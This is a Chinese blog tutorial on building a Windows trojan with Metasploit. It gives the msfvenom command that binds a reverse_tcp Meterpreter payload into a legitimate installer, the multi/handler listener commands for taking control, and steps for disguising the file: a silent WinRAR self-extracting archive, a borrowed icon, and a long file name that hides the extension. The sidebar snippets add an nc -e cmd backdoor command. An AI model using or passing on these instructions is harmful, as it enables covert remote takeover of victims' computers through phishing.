msf工具之木马程序制作以及伪装

最新推荐文章于 2024-12-27 21:34:21 发布
最新推荐文章于 2024-12-27 21:34:21 发布
阅读量8.8k 收藏 96
点赞数 92
CC 4.0 BY-SA版权
分类专栏: 学习技术 文章标签: kali
Powered By 行云博客(https://www.xy586.top)原创文章,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41679358/article/details/108547059
本文介绍如何使用MSFVENOM生成木马程序,并通过WinRAR自解压功能实现自动运行,包括设置监听端口、生成与控制木马过程,以及如何伪装木马程序。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文转自行云博客https://www.xy586.top

文章目录

捆绑木马

使用msfvenom制作木马程序:

#生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.138 -f exe -x /root/PhpStudy2018.exe -o /root/phpstudy.exe

在这里插入图片描述

将木马文件放入靶机中

在这里插入图片描述

#设置监听反弹
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.232.138
set lport 4444
run

将木马程序点击执行,监听端口得到回应,成功控制电脑
输入shell,彻底控制电脑

在这里插入图片描述

RAR自动解压

设置自动解压运行

设置rar自动解压格式让它在解压时运行恶意程序

模拟文本文档钓鱼

改良木马程序:

伪装:将网页代码和app进行绑定,然后压缩,使用WinRAR创建自解压格式
在这里插入图片描述

点击高级,在自解压选项中的常规中添加解压路径,
在这里插入图片描述

设置程序选项卡中填写解压前后运行的程序,
在这里插入图片描述

模式选项卡中静默模式选择全部隐藏
在这里插入图片描述

使用BeCyIconGrabber.exe软件提取出我们想要的软件图片ico
在这里插入图片描述

文本和图标选项中,选择加载我们刚刚生成的icon图标
在这里插入图片描述

生成了我们伪装过后的木马程序
在这里插入图片描述

同时可以将文件名称改成比较长的名字,在不选中文件的时候,文件名后面部分会被隐藏,达到隐藏后缀名的效果

渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 5087
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...
weixin_36005427的博客
03-27 2071
大马:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大马),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...
程序伪装
10-15
最新 程序伪装
木马生成工具 Netcat-网安界的瑞士军刀
最新发布
2301_80419020的博客
12-27 264
43.木马生成类似工具:Netcat(简称nc)(cat 有网络连接的意思),被人们誉为网络安全界的“瑞士军刀”格式:nc [options] [hostname] [port] 先向目标机上传nc.exe,并执行命令“nc -l -p 1234 -d -e cmd -t –L” 参数:(1)-d:无命令行界面,使用后台模式。 (2)-e:prog程序重定向,一旦连接就执行。 (3)-h:帮助信息。 (4)-i:延时间隔。 (5)-l:监听模式,用于入站连接。 (6)-L:连接关闭后,仍然继续监听,即可
伪装工具大全
10-27
伪装工具大全
msfvenom木马生成工具
weixin_45605313的博客
07-12 1773
msfvenom命令 命令
利用MSF生成php,windows,Linux三类木马
2301_76786857的博客
03-19 3239
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
MSF生成木马渗透WIN7
妖魔鬼怪快离开的博客
11-15 5616
生成木马 使用msf模块中的msfvenom模块,生成.exe木马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP地址 LPORT=4444 -f exe > /home/tim/桌面/qq.exe 启动msfconsole msfconsole 设置payload参数 //开启监听· use exploit/multi/handler //设置tcp监听 set payload windows/meterpreter/rev
MSF恶意程序利用+CS上线
dream2662583的博客
10-19 613
我是dream,我在新课程培训学习网安方面的知识,下面是关于msf恶意程序利用以及CS的内容。
网络安全-木马入侵windows -msfvenom反弹shell(CMD)
weixin_48137911的博客
02-19 6238
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
YzD伪装工具 v1.0.8.8免费版
12-11
为您提供YzD伪装工具下载,YzD伪装工具是一款将压缩包伪装图片的小工具,用于对文件进行伪装,暂仅适用于压缩包,支持zip.rar.7z等常用格式,伪装效果为图片文件,可支持png.jpg.gif,bmg等图片格式!使用说明  默认为bmg,因该图片格式大小较大,可根据需求自行修改  只要不注意看图片大小并将查看改为大图标,隐藏效果还是很好的  将想隐藏的东西压缩成加密压缩包后再用本工具进行伪装
SuperPid修改进程PID工具驱动级.别名.SP伪装进程工具
07-02
SuperPid修改进程PID工具界面是VB些的,底层驱动是C语言写的。作者提供源代码,可惜源代码要180元....如今先拿他的成品软件用用 。还有次工具 别名为 "SP伪装进程"。说白了和 他之前的SuperHide差不多,只是SuperPid 进程名不隐藏,只修改了进程PID,导致一个空壳进程。
加壳免杀工具\FakeNinja2伪装免杀.8.rar
04-04
2010adsl2010adsl2010adsl2010adsl2010adsl2010adsl2010adsl
edjpgcom图片一写入木马小工具
03-17
edjpgcom图片一写入木马小工具,文件上传漏洞与文件包含漏洞进行渗透测试必备工具,软件仅供研究测试,严禁非法使用!!!
【木马生成工具Msfvenom介绍及利用
Sagittarius32的博客
07-14 5832
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。...
14、TheFatRat木马生成工具-创建后门或payload
无痕的博客
12-14 3192
TheFatRat木马生成工具创建后门或payload
木马采用的伪装方法
ヤ冰楓ˊ﹋ろ
11-21 2043
 1.修改图标   木马服务端所用的图标也是有讲究的,木马经常故意伪装成了XT.HTML等你可能认为对系统没有多少危害的文件图标,这样很容易诱惑你把它打开。看看,木马是不是很狡猾?   2.捆绑文件   这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的情况下,偷偷地进入了系统。被捆绑的文件一般是可执行文件 (即EXE、COM一类的文件)。   3.出
kali-TheFatRat木马生成工具安装及简单使用
热门推荐
qq_35258210的博客
02-10 1万+
kali终端下载 命令:git clone https://github.com/Screetsec/TheFatRat.git 推荐使用浏览器github上下载,比命令下载要快 浏览器下载:https://github.com/Screetsec/TheFatRat.git 下载完后将压缩包放到kali系统里 使用终端解压文件 命令:unzip 接下来要使用到的是这三个工具,我们想要使用先给它们添加可执行权限 命令:chmod +x setup.sh powerfull.s
简单木马的制作
qq_66656628的博客
03-07 656
展示简单木马的制作过程,对我们防范木马具有启示
kail里面使用msf工具生成一个Android木马程序
09-20
Kali Linux是一个著名的开源渗透测试平台,其中包含Metasploit Framework (MSF) 这个强大的攻击工具集。如果你想在Kali里利用Metasploit生成针对Android的恶意软件(木马),你需要按照以下步骤操作: 1. **安装 ...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值